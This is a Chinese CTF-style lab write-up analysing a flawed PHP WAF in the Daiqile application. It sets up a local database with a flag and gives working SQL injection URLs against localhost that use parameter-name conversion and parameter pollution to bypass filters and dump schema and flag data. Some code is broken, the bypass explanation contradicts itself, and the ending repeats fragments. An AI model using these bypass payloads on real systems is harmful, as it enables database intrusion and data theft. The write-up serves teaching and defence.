贷齐乐错误的WAF引起的SQL注入漏洞复现与分析<\/h1>

漏洞概述<\/h2>

本漏洞是基于错误的WAF（Web应用防火墙）实现导致的SQL注入漏洞，与SQLi靶场中的29关到31关类似，但存在关键区别：<\/p>

本漏洞由错误的WAF引起<\/li>
29-31关由HTTP参数污染(HPP)引起<\/li>

本漏洞涉及HPP全局参数污染以及PHP的特性<\/li> <\/ul>

环境准备<\/h2>

所需环境<\/h3>

PHP版本：5.4.45（不支持PHP7）<\/li>
中间件：Apache<\/li>

数据库：MySQL 5.7.26<\/li> <\/ul>

数据库设置<\/h3>

创建数据库：<\/li> <\/ol>

CREATE<\/span> DATABASE<\/span> ctf;
<\/span><\/span><\/code><\/pre>
创建表：<\/li>
<\/ol>
CREATE<\/span> TABLE<\/span> `<\/span>users`<\/span> (
<\/span><\/span>  `<\/span>Id`<\/span> int(11<\/span>) NOT<\/span> NULL<\/span> AUTO_INCREMENT,
<\/span><\/span>  `<\/span>name`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  `<\/span>pass`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  `<\/span>flag`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  PRIMARY<\/span> KEY<\/span> (`<\/span>Id`<\/span>)
<\/span><\/span>) ENGINE=<\/span>MyISAM AUTO_INCREMENT=<\/span>2<\/span> DEFAULT<\/span> CHARSET=<\/span>utf8;
<\/span><\/span><\/code><\/pre>
插入测试数据：<\/li>
<\/ol>
INSERT<\/span> INTO<\/span> `<\/span>users`<\/span> (`<\/span>name`<\/span>, `<\/span>pass`<\/span>, `<\/span>flag`<\/span>) 
<\/span><\/span>VALUES<\/span> ('admin'<\/span>, 'qwer!@#zxca'<\/span>, 'hrctf{R3qu3st_Is_1nterEst1ng}'<\/span>);
<\/span><\/span><\/code><\/pre>WAF分析<\/h2>
第一道WAF<\/h3>
function<\/span> dowith_sql<\/span>($str) {
<\/span><\/span>    $check =<\/span> preg_match<\/span>('\/select|insert|update|delete|union|into|load_file|outfile\/is'<\/span>, $str);
<\/span><\/span>    if<\/span>($check) {
<\/span><\/span>        echo<\/span> "非法字符!"<\/span>;
<\/span><\/span>        exit<\/span>();
<\/span><\/span>    }
<\/span><\/span>    $newstr =<\/span> ""<\/span>;
<\/span><\/span>    while<\/span>($newstr !=<\/span> $str) {
<\/span><\/span>        $newstr =<\/span> $str;
<\/span><\/span>        $str =<\/span> str_replace<\/span>("script"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("execute"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("update"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("master"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("truncate"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("declare"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("select"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("create"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("delete"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>("insert"<\/span>, ""<\/span>, $str);
<\/span><\/span>        $str =<\/span> str_replace<\/span>(str<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $str;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>第二道WAF<\/h3>
function<\/span> safe_str<\/span>($str) {
<\/span><\/span>    if<\/span>(!<\/span>get_magic_quotes_gpc<\/span>()) {
<\/span><\/span>        if<\/span>(is_array<\/span>($str)) {
<\/span><\/span>            foreach<\/span>($str as<\/span> $key =><\/span> $value) {
<\/span><\/span>                $str[$key] =<\/span> safe_str<\/span>($value);
<\/span><\/span>            }
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            $str =<\/span> addslashes<\/span>($str);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $str;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> dhtmlspecialchars<\/span>($string) {
<\/span><\/span>    if<\/span>(is_array<\/span>($string)) {
<\/span><\/span>        foreach<\/span>($string as<\/span> $key =><\/span> $val) {
<\/span><\/span>            $string[$key] =<\/span> dhtmlspecialchars<\/span>($val);
<\/span><\/span>        }
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        $string =<\/span> str_replace<\/span>(array<\/span>('&'<\/span>, '"'<\/span>, '<'<\/span>, '>'<\/span>), array<\/span>('&'<\/span>, '"'<\/span>, '<'<\/span>, '>'<\/span>), $string);
<\/span><\/span>        if<\/span>(strpos<\/span>($string, '&#'<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>            $string =<\/span> preg_replace<\/span>('\/&((#(\d{3,5}|x[a-fA-F0-9]{4}));)\/'<\/span>, '&\\1'<\/span>, $string);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $string;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h2>
PHP特性利用<\/h3>


参数名转换特性<\/strong>：PHP在解析参数时，会将参数名中的点(.)、空格( )等字符转换为下划线(_)<\/p>

例如：i.d<\/code>会被转换为i_d<\/code><\/li>
<\/ul>
<\/li>

参数处理顺序<\/strong>：<\/p>

第一道WAF处理$_REQUEST<\/code>时，会处理转换后的参数名<\/li>
第二道WAF处理$_SERVER['REQUEST_URI']<\/code>时，处理原始参数名<\/li>
<\/ul>
<\/li>
<\/ol>
绕过思路<\/h3>


构造两个参数：<\/p>

i_d=恶意payload<\/code>：会被第一道WAF检测<\/li>
i.d=正常值<\/code>：会被第一道WAF忽略（因为参数名不同）<\/li>
<\/ul>
<\/li>

由于PHP的参数处理特性：<\/p>

第一道WAF看到的是i_d=正常值<\/code><\/li>
第二道WAF看到的是i.d=恶意payload<\/code>并覆盖i_d<\/code>的值<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现步骤<\/h2>
1. 测试参数转换<\/h3>
http:\/\/127.0.0.1\/daiqile\/index.php\/?i_d=bad'&i.d=111&submit=1
<\/code><\/pre>
2. 联合查询注入<\/h3>
由于不能使用括号，使用注释代替空格：<\/p>
确定回显字段<\/h4>
http:\/\/127.0.0.1\/daiqile\/index.php\/?i_d=-1\/**\/union\/**\/select\/**\/1,2,3,4&i.d=1&submit=1
<\/code><\/pre>
爆出数据库名<\/h4>
http:\/\/127.0.0.1\/daiqile\/index.php\/?i_d=-1\/**\/union\/**\/select\/**\/1,table_schema,3,4\/**\/from\/**\/information_schema.tables&i.d=1&submit=1
<\/code><\/pre>
爆出表名<\/h4>
http:\/\/127.0.0.1\/daiqile\/index.php\/?i_d=-1\/**\/union\/**\/select\/**\/1,table_name,3,4\/**\/from\/**\/information_schema.tables\/**\/where\/**\/table_schema\/**\/like\/**\/0x637466\/**\/limit\/**\/0,1&i.d=1&submit=1
<\/code><\/pre>
注：0x637466<\/code>是"ctf"的十六进制表示<\/p>
爆出列名<\/h4>
http:\/\/127.0.0.1\/daiqile\/index.php\/?&i_d=-1\/**\/union\/**\/select\/**\/1,column_name,3,4\/**\/from\/**\/information_schema.columns\/**\/where\/**\/table_schema\/**\/like\/**\/0x637466\/**\/and\/**\/table_name\/**\/like\/**\/0x7573657273\/**\/limit\/**\/0,1&i.d=1&submit=1
<\/code><\/pre>
注：0x7573657273<\/code>是"users"的十六进制表示<\/p>
获取flag<\/h4>
http:\/\/127.0.0.1\/daiqile\/index.php\/?i_d=-1\/**\/union\/**\/select\/**\/1,flag,3,4\/**\/from\/**\/ctf.users&i.d=1&submit=1
<\/code><\/pre>
关键知识点总结<\/h2>

PHP参数名转换<\/strong>：PHP会将GET参数名中的点(.)转换为下划线(_)<\/li>
WAF处理顺序<\/strong>：

第一道WAF处理转换后的参数名<\/li>
第二道WAF处理原始参数名并覆盖值<\/li>
<\/ul>
<\/li>
HPP(HTTP参数污染)<\/strong>：利用同名参数最后一个生效的特性<\/li>
绕过技术<\/strong>：

使用i_d<\/code>和i.d<\/code>两个参数<\/li>
第一道WAF检测i_d=正常值<\/code><\/li>
第二道WAF处理i.d=恶意payload<\/code>并覆盖i_d<\/code><\/li>
<\/ul>
<\/li>
SQL注入技巧<\/strong>：

使用\/**\/<\/code>代替空格<\/li>
使用like<\/code>代替=<\/code>（因为等号被过滤）<\/li>
使用十六进制表示字符串值<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

统一参数名处理方式<\/li>
在WAF中处理原始URI和转换后的参数<\/li>
使用参数白名单机制<\/li>
使用预编译语句(Prepared Statement)防止SQL注入<\/li>
升级到最新PHP版本，避免使用已弃用的函数<\/li>
<\/ol>

贷齐乐错误的WAF引起的SQL注入漏洞复现与分析<\/h1>

环境准备<\/h2>

WAF分析<\/h2>

漏洞原理<\/h2>

漏洞复现步骤<\/h2>

2. 联合查询注入<\/h3> 由于不能使用括号，使用注释代替空格：<\/p>

防御建议<\/h2> 统一参数名处理方式<\/li> 在WAF中处理原始URI和转换后的参数<\/li> 使用参数白名单机制<\/li> 使用预编译语句(Prepared Statement)防止SQL注入<\/li> 升级到最新PHP版本，避免使用已弃用的函数<\/li> <\/ol>

2. 联合查询注入<\/h3>
由于不能使用括号，使用注释代替空格：<\/p>

防御建议<\/h2>

统一参数名处理方式<\/li>
在WAF中处理原始URI和转换后的参数<\/li>
使用参数白名单机制<\/li>
使用预编译语句(Prepared Statement)防止SQL注入<\/li>
升级到最新PHP版本，避免使用已弃用的函数<\/li> <\/ol>